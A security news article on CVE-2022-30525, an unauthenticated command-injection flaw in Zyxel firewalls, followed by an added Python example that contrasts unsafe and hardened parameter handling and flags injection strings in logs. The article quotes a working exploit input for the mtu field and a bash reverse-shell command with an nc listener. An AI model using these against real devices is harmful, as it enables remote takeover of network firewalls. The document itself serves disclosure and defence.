Vulnerability in Zyxel firewalls allowing code execution without authentication

A critical vulnerability (CVE-2022-30525) has been identified in the Zyxel ATP, VPN, and USG FLEX series devices, which provide firewall, IDS, and VPN functions for enterprises. To carry out an attack, an attacker must be able to send requests to the device over HTTP/HTTPS. Zyxel has fixed the vulnerability in the ZLD 5.30 firmware update. According to the Shodan service, there are currently 16213 potentially vulnerable devices reachable on the Internet that accept HTTP/HTTPS requests.

Exploitation consists of sending specially crafted commands to the /ztp/cgi-bin/handler web handler, which is accessible without authentication. The problem is caused by the lack of proper sanitization of request parameters before they are passed to the os.system call used in the lib_wan_settings.py library when processing the setWanPortSt operation.

For example, an attacker can pass the string "; ping 192.168.1.210;" in the mtu field, which results in the command "ping 192.168.1.210" being executed on the device. To obtain a command shell, the attacker can run "nc -lvnp 1270" on their own system and then initiate a reverse connection (reverse shell) by sending the device a request with the parameter '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
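The two paragraphs above describe a classic command-injection pattern: a request parameter (mtu) is interpolated into a string handed to os.system, so shell metacharacters in the parameter become separate commands. The following example, added here and not taken from Zyxel's firmware or the original article, shows the vulnerable string build next to a hardened handler that validates mtu as a bounded integer and runs the command as an argv list without a shell, plus a small triage function that flags handler requests carrying shell metacharacters in web-server log lines. The interface name wan0, the MTU bounds, the function names, and the log-line format are assumptions; the log lines are constructed.

```python
"""Added example (not Zyxel's code): unsafe vs. hardened handling of a
request parameter that ends up in a system command, and log triage."""
import re
import subprocess
from urllib.parse import parse_qs

# Assumed plausible MTU bounds for a WAN interface (not from the advisory).
MTU_MIN, MTU_MAX = 576, 9000

# Shell metacharacters that must never reach a shell-interpreted command.
SHELL_META = re.compile("[" + re.escape(";&|`$()<>\\\"'\n") + "]")


def build_command_unsafely(mtu: str) -> str:
    """The vulnerable pattern: a raw request parameter interpolated into a
    command string destined for os.system. Here it is only built, never run,
    so the test can show that metacharacters pass straight through."""
    return f"ip link set dev wan0 mtu {mtu}"  # hypothetical command


def validate_mtu(mtu: str) -> int:
    """Allow-list validation: the parameter must be a bare integer in range."""
    if not re.fullmatch(r"[0-9]{3,4}", mtu):
        raise ValueError(f"mtu is not a plain integer: {mtu!r}")
    value = int(mtu)
    if not MTU_MIN <= value <= MTU_MAX:
        raise ValueError(f"mtu {value} outside {MTU_MIN}-{MTU_MAX}")
    return value


def build_command_safely(mtu: str) -> list[str]:
    """Hardened form: the validated value is placed into an argv list, so no
    shell ever parses it."""
    return ["ip", "link", "set", "dev", "wan0", "mtu", str(validate_mtu(mtu))]


def set_wan_mtu(mtu: str, runner=subprocess.run):
    """Runs the hardened command without a shell. `runner` is injectable so
    the function can be exercised without touching real interfaces."""
    return runner(build_command_safely(mtu), shell=False, check=True)


def flag_suspicious_requests(log_lines: list[str]) -> list[str]:
    """Detection: flag handler requests whose parameters carry shell
    metacharacters. Assumed log format:
    '<timestamp> <client> <method> <path> <urlencoded body>'."""
    flagged = []
    for line in log_lines:
        parts = line.split(" ", 4)
        if len(parts) < 5:
            continue  # no request body to inspect
        _ts, client, _method, path, body = parts
        if path != "/ztp/cgi-bin/handler":
            continue
        params = parse_qs(body, keep_blank_values=True)
        for key, values in params.items():
            if any(SHELL_META.search(v) for v in values):
                flagged.append(f"{client} {key}={values[0]!r}")
                break
    return flagged


# Constructed sample log lines (not real traffic); the second one carries the
# injection string quoted in the article, URL-encoded.
SAMPLE_LOG = [
    "2022-05-12T10:00:01Z 198.51.100.7 POST /ztp/cgi-bin/handler command=setWanPortSt&mtu=1500&port=4",
    "2022-05-12T10:00:02Z 203.0.113.9 POST /ztp/cgi-bin/handler command=setWanPortSt&mtu=%3B+ping+192.168.1.210%3B&port=4",
    "2022-05-12T10:00:03Z 198.51.100.7 GET /index.html",
]

if __name__ == "__main__":
    print("unsafe build :", build_command_unsafely("; ping 192.168.1.210;"))
    print("safe build   :", build_command_safely("1500"))
    for hit in flag_suspicious_requests(SAMPLE_LOG):
        print("suspicious   :", hit)
```

The fix that matters is the combination of strict allow-list validation (an MTU is a small integer, nothing else) and passing arguments as a list with shell=False; escaping alone is fragile. The triage function is deliberately simple and only demonstrates the idea of inspecting parameters to the unauthenticated handler for metacharacters; in practice the ZLD 5.30 update is the remediation.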

Source: opennet.ru
